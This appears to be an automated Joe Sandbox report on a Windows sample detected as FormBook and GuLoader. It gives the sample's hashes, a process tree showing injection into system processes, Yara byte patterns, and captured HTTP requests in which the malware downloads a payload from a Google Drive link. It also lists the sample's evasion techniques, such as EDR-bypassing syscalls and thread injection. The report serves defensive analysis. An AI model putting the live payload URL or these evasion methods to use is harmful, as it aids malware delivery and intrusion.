Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PEDIDO-144797.exe

Overview

General Information

Sample name:PEDIDO-144797.exe
Analysis ID:1525501
MD5:2c5483106fe248cced82541b91cba20e
SHA1:41e69017b26287ee7814bb35a967672ba58cb714
SHA256:2702bb251c14965787b39f03a9c41000b9b0421528578e5a6a221ad8b27f182d
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • PEDIDO-144797.exe (PID: 8048 cmdline: "C:\Users\user\Desktop\PEDIDO-144797.exe" MD5: 2C5483106FE248CCED82541B91CBA20E)
    • PEDIDO-144797.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\PEDIDO-144797.exe" MD5: 2C5483106FE248CCED82541B91CBA20E)
      • RAVCpl64.exe (PID: 6740 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • SecEdit.exe (PID: 6980 cmdline: "C:\Windows\SysWOW64\SecEdit.exe" MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
          • explorer.exe (PID: 4912 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bf40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1400f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bf40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1400f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 2 entries

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-04T10:50:43.162760+020028032702Potentially Bad Traffic192.168.11.2049732142.251.40.206443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: PEDIDO-144797.exeAvira: detected
        Multi AV Scanner detection for submitted file
        Source: PEDIDO-144797.exeReversingLabs: Detection: 34%
        Source: PEDIDO-144797.exeVirustotal: Detection: 38%Perma Link
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: PEDIDO-144797.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.251.40.206:443 -> 192.168.11.20:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.80.97:443 -> 192.168.11.20:49733 version: TLS 1.2
        Source: PEDIDO-144797.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: SecEdit.pdb source: PEDIDO-144797.exe, 00000002.00000003.90053138743.00000000024BA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: SecEdit.pdbGCTL source: PEDIDO-144797.exe, 00000002.00000003.90053138743.00000000024BA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: PEDIDO-144797.exe, 00000002.00000003.90000854380.000000003231C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90004392454.00000000324C5000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000003.90088339001.0000000002D10000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000003.90084646981.0000000002B63000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: PEDIDO-144797.exe, PEDIDO-144797.exe, 00000002.00000003.90000854380.000000003231C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90004392454.00000000324C5000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, SecEdit.exe, 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000003.90088339001.0000000002D10000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000003.90084646981.0000000002B63000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_004066F3 FindFirstFileW,FindClose,0_2_004066F3
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405ABE
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h3_2_050C5FAA
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4x nop then mov ebx, 00000004h4_2_02DD04DE
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49732 -> 142.251.40.206:443
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: explorer.exe, 00000005.00000002.94452918228.000000000D4A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565997400.000000000D4A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
        Source: PEDIDO-144797.exe, 00000002.00000003.89664710675.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: PEDIDO-144797.exe, 00000002.00000003.89664710675.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: explorer.exe, 00000005.00000002.94452918228.000000000D4A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565997400.000000000D4A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
        Source: PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: PEDIDO-144797.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: explorer.exe, 00000005.00000002.94452918228.000000000D4A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565997400.000000000D4A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: explorer.exe, 00000005.00000000.91562314503.0000000009948000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94447093976.0000000009948000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crl_
        Source: explorer.exe, 00000005.00000000.91563709105.000000000A9E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.91558832216.00000000032F0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.94448609733.0000000009DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000626000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: PEDIDO-144797.exe, 00000002.00000003.89664710675.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: PEDIDO-144797.exe, 00000002.00000001.89609492793.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: PEDIDO-144797.exe, 00000002.00000001.89609492793.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: explorer.exe, 00000005.00000002.94446111895.0000000009864000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009864000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.92004096261.00000000098DB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
        Source: explorer.exe, 00000005.00000000.91561655678.00000000097EF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.00000000097EF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
        Source: explorer.exe, 00000005.00000002.94446111895.0000000009700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=02bde011-1e9
        Source: explorer.exe, 00000005.00000000.91565423827.000000000D2F4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 00000005.00000002.94452035443.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565423827.000000000D2BF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DC09251A71C5472DA2BDFD73DC109609&timeOut=5000&oc
        Source: explorer.exe, 00000005.00000002.94452035443.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565423827.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: PEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: explorer.exe, 00000005.00000002.94447093976.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91562314503.00000000099B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
        Source: explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_In
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svg
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.pn
        Source: explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.sv
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.png
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.svg
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/Weather/W36_Most
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/WeatherInsight/W
        Source: explorer.exe, 00000005.00000002.94446111895.0000000009700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.f
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-dark
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gD5m
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI-dark
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW-dark
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-dark
        Source: PEDIDO-144797.exe, 00000002.00000002.90087025305.0000000002412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: PEDIDO-144797.exe, 00000002.00000002.90087025305.0000000002426000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90097431649.00000000319C0000.00000004.00001000.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087025305.0000000002412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi
        Source: PEDIDO-144797.exe, 00000002.00000002.90087025305.0000000002412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYiY
        Source: PEDIDO-144797.exe, 00000002.00000002.90087025305.0000000002426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYih
        Source: PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: PEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087203673.0000000002440000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957706436.0000000002440000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002219442.0000000002440000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi&export=download
        Source: PEDIDO-144797.exe, 00000002.00000003.89957706436.0000000002436000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002219442.0000000002436000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90001884355.0000000002436000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087203673.0000000002438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi&export=download(S
        Source: explorer.exe, 00000005.00000000.91567643029.000000000D9E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA179X84.img
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1g7bhz.img
        Source: explorer.exe, 00000005.00000002.94446111895.0000000009700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1gKAgr.&
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1lLvot.img
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1nsFzx.img
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA36Tom.img
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAUhLdx.img
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAY97Jf.img
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAaeOki.img
